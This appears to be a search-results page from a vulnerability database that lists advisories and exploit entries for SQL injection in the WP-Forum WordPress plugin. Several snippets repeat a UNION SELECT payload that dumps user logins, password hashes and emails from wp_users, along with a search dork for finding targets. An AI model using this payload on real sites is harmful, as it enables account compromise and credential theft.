12 matches found
Wordpress plugin WP-Forum 1.7.4 - Remote SQL Injection Vulnerability
No description provided by source. remote sql injection exploit -::DESCRIPTION== WordPress forum plugin by Fredrik Fahlstad. Version: 1.7.4. exploit: 1+union+select+null,concatuserlogin,0x2f,userpass,0x2f,useremail,null,null,null,null,null+from+wpusers where id=1/ wptbvusers google: Fredrik...
HTB22860: SQL Injection in WP Forum wordpress plugin
Vulnerability ID: HTB22860 Reference: http://www.htbridge.ch/advisory/sqlinjectioninwpforumwordpressplugin2.html Product: WP Forum wordpress plugin Vendor: Fredrik Fahlstad http://www.fahlstad.se/ Vulnerable Version: 1.7.8 Vendor Notification: 15 February 2011 Vulnerability Type: SQL Injection Ri...
WP Forum WordPress Plugin 1.7.8 SQL Injection
================================= Vulnerability ID: HTB22860 Reference: http://www.htbridge.ch/advisory/sqlinjectioninwpforumwordpressplugin2.html Product: WP Forum wordpress plugin Vendor: Fredrik Fahlstad http://www.fahlstad.se/ Vulnerable Version: 1.7.8 Vendor Notification: 15 February 2011...
HTB22858: SQL Injection in WP Forum wordpress plugin
Vulnerability ID: HTB22858 Reference: http://www.htbridge.ch/advisory/sqlinjectioninwpforumwordpressplugin.html Product: WP Forum wordpress plugin Vendor: Fredrik Fahlstad http://www.fahlstad.se/ Vulnerable Version: 1.7.8 Vendor Notification: 15 February 2011 Vulnerability Type: SQL Injection Ris...
HTB22859: SQL Injection in WP Forum wordpress plugin
Vulnerability ID: HTB22859 Reference: http://www.htbridge.ch/advisory/sqlinjectioninwpforumwordpressplugin1.html Product: WP Forum wordpress plugin Vendor: Fredrik Fahlstad http://www.fahlstad.se/ Vulnerable Version: 1.7.8 Vendor Notification: 15 February 2011 Vulnerability Type: SQL Injection Ri...
WordPress WP-Forum插件多个SQL注入漏洞
BUGTRAQ ID: 37357 CVE ID: CVE-2009-3703 WP-Forum是一款基于PHP的WordPress插件。 WP-Forum的wpf.class.php页面没有正确地过滤用户所提交的forum、topic和searchmax参数,以及在 editpost或viewtopic操作中所提交的id参数,远程攻击者可以通过提交恶意参数请求执行SQL注入攻击。以下是有漏洞的代码段: wpf.class文件 1836 $optionmaxdays = $POST'searchmax'; // - this line is not being sanitized 183...
wordpress-xss.txt
. . | / | | \ \ | / / |\ \ \ |/ // / /\ \ / |/ \ / // | / | | / \ /|\ / / / / \ / \ / / / \ | | /\ /\ / \ | \ // / / forum.darkc0de.com --- d3hydr8 - rsauron - P47r1ck - r45c4l - baltazar - bennu --- QKrun1x - skillfaker - C1c4Tr1Z - Optyx -Nuclear Author: FeDeReR and sinner01...
wpforum-sql.txt
remote sql injection exploit -::DESCRIPTION== WordPress forum plugin by Fredrik Fahlstad. Version: 1.7.4. exploit: 1+union+select+null,concatuserlogin,0x2f,userpass,0x2f,useremail,null,null,null,null,null+from+wpusers where id=1/ wptbvusers google: Fredrik Fahlstad. Version: 1.7.4. author websec...
Wordpress plugin WP-Forum 1.7.4 Remote SQL Injection Vulnerability
No description provided by source. remote sql injection exploit -::DESCRIPTION== WordPress forum plugin by Fredrik Fahlstad. Version: 1.7.4. exploit: 1+union+select+null,concatuserlogin,0x2f,userpass,0x2f,useremail,null,null,null,null,null+from+wpusers where id=1/ wptbvusers google: Fredrik...
WordPress Plugin WP-Forum 1.7.4 - SQL Injection
WordPress Plugin WP-Forum 1.7.4 - SQL Injection remote sql injection exploit -::DESCRIPTION== WordPress forum plugin by Fredrik Fahlstad. Version: 1.7.4. exploit: 1+union+select+null,concatuserlogin,0x2f,userpass,0x2f,useremail,null,null,null,null,null+from+wpusers where id=1/ wptbvusers google:...
WordPress Plugin WP-Forum 1.7.4 - SQL Injection
remote sql injection exploit -::DESCRIPTION== WordPress forum plugin by Fredrik Fahlstad. Version: 1.7.4. exploit: 1+union+select+null,concatuserlogin,0x2f,userpass,0x2f,useremail,null,null,null,null,null+from+wpusers where id=1/ wptbvusers google: Fredrik Fahlstad. Version: 1.7.4. author websec...
Wordpress plugin WP-Forum 1.7.4 Remote SQL Injection Vulnerability
Exploit for unknown platform in category web applications ================================================================== Wordpress plugin WP-Forum 1.7.4 Remote SQL Injection Vulnerability ================================================================== remote sql injection exploit...